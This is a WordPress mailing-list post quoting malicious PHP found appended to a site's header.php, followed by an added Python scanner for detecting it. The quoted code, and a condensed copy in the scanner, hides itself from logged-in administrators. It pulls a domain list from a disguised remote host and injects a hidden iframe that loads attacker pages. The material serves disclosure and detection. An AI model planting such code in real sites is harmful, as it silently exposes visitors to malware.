[wp-hackers] Malware infestation ensures the admin can't encounter malware code via header.php
Raj Sekharan
flarecore at gmail.com
Fri Oct 7 08:23:23 UTC 2011
Hope it helps someone.
On Fri, Oct 7, 2011 at 1:52 PM, Raj Sekharan <flarecore at gmail.com> wrote:
> My website was recently compromised, and my header.php file was appended
> with the following code:
>
> <!-- Wordpress Counter -->
> <?php
> if ( !is_user_logged_in() && !isset ( $_COOKIE['MTPT'] ) ) {
>     if ( get_option ( 'domain_update' ) === FALSE && ( $newdomain = get_new_domain() ) ) {
>         add_option ( 'domain', $newdomain, '', 'no' );
>         add_option ( 'domain_update', time (), '', 'no' );
>     }
>     if ( time () - get_option ( 'domain_update' ) > 10*60 && ( $newdomain = get_new_domain() ) ) {
>         update_option ( 'domain', $newdomain );
>         update_option ( 'domain_update', time () );
>     }
>
>     $domain = get_option ( 'domain' );
>     if ($domain)
>         echo
>         '<script language="javascript">
>         var ExpDate = new Date ();
>         ExpDate.setTime(ExpDate.getTime() + (7 * 24 * 60 * 60));
>         SetCookie("MTPT","1",ExpDate, "/");
>
>         function SetCookie (name, value) {
>             var argv = SetCookie.arguments;
>             var argc = SetCookie.arguments.length;
>             var expires = (argc > 2) ? argv[2] : null;
>             var path = (argc > 3) ? argv[3] : null;
>             var domain = (argc > 4) ? argv[4] : null;
>             var secure = (argc > 5) ? argv[5] : false;
>             document.cookie = name + "=" + escape (value) +
>                 ((expires == null) ? "" : ("; expires=" + expires.toGMTString())) +
>                 ((path == null) ? "" : ("; path=" + path)) +
>                 ((domain == null) ? "" : ("; domain=" + domain)) +
>                 ((secure == true) ? "; secure" : "");
>         }
>         </script>
>         <iframe src="http://' . $domain . '/kwizhveo.php" width="1" height="1" frameborder="0">
>         </iframe>';
> }
>
> function get_new_domain () {
>     $url = 'http://googlesafebrowsing.com/remoted.cc.txt';
>     if ( function_exists ( 'curl_init' ) ) {
>         $ch = @curl_init ( $url );
>         @curl_setopt ( $ch, CURLOPT_RETURNTRANSFER, TRUE );
>         $doms = @curl_exec ( $ch );
>         @curl_close ( $ch );
>     }
>     else
>         $doms = @file_get_contents ( $url );
>     if ( strpos ( $doms, '||' ) === false )
>         return false;
>
>     $domains = explode ( '||', trim ( $doms ) );
>     return $domains[array_rand ( $domains )];
> }
> ?>
>
> <!-- Wordpress Counter -->
>
> Unlike before, where a dummy iframe was just appended, this one ensures that
> the logged-in administrator cannot actually encounter the malware code. The
> attacker even called it "WordPress Counter" in the comment.
>
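The quoted sample, as an added example that is not part of the post or of WordPress: a small Python triage script that scans a theme file for the indicators that co-occur in the posted code (cloaking on is_user_logged_in() plus a marker cookie, a remote '||'-separated domain list picked with array_rand, a 1x1 iframe, options added with autoload 'no'), parses a domain list the way get_new_domain() does, and replays the cloaking gate so a responder knows the page has to be fetched with no session and an empty cookie jar to see the payload at all. The embedded infected and clean header fragments are constructed (the infected one condenses the post's code), and the indicator regexes and the three-hit threshold are this example's own choices, not a published signature. One caveat for anyone reproducing the behaviour: the injected JavaScript passes 7 * 24 * 60 * 60 to setTime(), which takes milliseconds, so the MTPT suppression cookie actually expires after roughly ten minutes rather than seven days, and a visitor who was served the iframe once will be served it again soon after.

```python
"""Added triage helpers for the header.php infection discussed in the post.

Not code from the post or from WordPress: an illustrative scanner written for
this page. It flags indicators that co-occur in the posted sample, parses a
'||'-separated domain list the way get_new_domain() does, and replays the
cloaking decision so a responder knows which visitor state sees the payload.
The indicator regexes, the threshold and both sample headers are this
example's own constructions.
"""
import re
from typing import Dict, List, Optional

# Indicator name -> regex over PHP source. Each one alone can be legitimate;
# the verdict requires several to co-occur in the same file.
INDICATORS = {
    "cloak_logged_in": re.compile(r"!\s*is_user_logged_in\s*\(\s*\)"),
    "cloak_cookie": re.compile(r"!\s*isset\s*\(\s*\$_COOKIE\["),
    "remote_fetch": re.compile(r"\b(curl_init|file_get_contents)\s*\("),
    "domain_list": re.compile(r"explode\s*\(\s*'\|\|'"),
    "random_domain": re.compile(r"\barray_rand\s*\("),
    "hidden_iframe": re.compile(r'<iframe[^>]*width="1"[^>]*height="1"', re.I),
    "hidden_option": re.compile(r"add_option\s*\([^)]*,\s*'no'\s*\)"),
}


def scan_php(source: str, threshold: int = 3) -> Dict[str, object]:
    """Return the indicator names found in a PHP source string and a verdict."""
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(source))
    return {"hits": hits, "suspicious": len(hits) >= threshold}


def parse_domain_list(payload: str) -> Optional[List[str]]:
    """Mirror get_new_domain(): the C2 reply is a '||'-separated list, and a
    reply without the separator means 'keep the current domain'."""
    if "||" not in payload:
        return None
    return [d for d in payload.strip().split("||") if d]


def payload_shown(logged_in: bool, cookies: Dict[str, str],
                  domain: Optional[str], marker_cookie: str = "MTPT") -> bool:
    """Replay the sample's gate: the iframe is emitted only to an anonymous
    visitor who lacks the marker cookie, and only once a domain is stored.
    So test a suspect site with no session and a fresh cookie jar."""
    return (not logged_in) and marker_cookie not in cookies and bool(domain)


# Constructed sample: a condensed version of the block quoted in the post.
INFECTED_HEADER = r'''<!DOCTYPE html><head><?php wp_head(); ?></head>
<!-- Wordpress Counter -->
<?php
if ( !is_user_logged_in() && !isset ( $_COOKIE['MTPT'] ) ) {
    if ( get_option ( 'domain_update' ) === FALSE && ( $newdomain = get_new_domain() ) ) {
        add_option ( 'domain', $newdomain, '', 'no' );
    }
    $domain = get_option ( 'domain' );
    if ($domain)
        echo '<iframe src="http://' . $domain . '/kwizhveo.php" width="1" height="1" frameborder="0"></iframe>';
}
function get_new_domain () {
    $doms = @file_get_contents ( 'http://googlesafebrowsing.com/remoted.cc.txt' );
    if ( strpos ( $doms, '||' ) === false ) return false;
    $domains = explode ( '||', trim ( $doms ) );
    return $domains[array_rand ( $domains )];
}
?>
<!-- Wordpress Counter -->'''

# Constructed sample: an ordinary theme header with nothing injected.
CLEAN_HEADER = r'''<!DOCTYPE html>
<html <?php language_attributes(); ?>>
<head><?php wp_head(); ?></head>
<body <?php body_class(); ?>>'''


if __name__ == "__main__":
    for label, src in (("infected", INFECTED_HEADER), ("clean", CLEAN_HEADER)):
        print(label, scan_php(src))
    print("anonymous, no MTPT cookie:", payload_shown(False, {}, "c2.example"))
    print("logged-in admin:          ", payload_shown(True, {}, "c2.example"))
```

Run it against each PHP file under wp-content/themes (and, since the sample stores its state in wp_options, also look for unexpected 'domain' and 'domain_update' rows with autoload set to 'no', which the dashboard never displays). A file that trips only one indicator is normal; the combination of visitor cloaking, a remote domain list and a hidden iframe is what separates this injection from legitimate theme code.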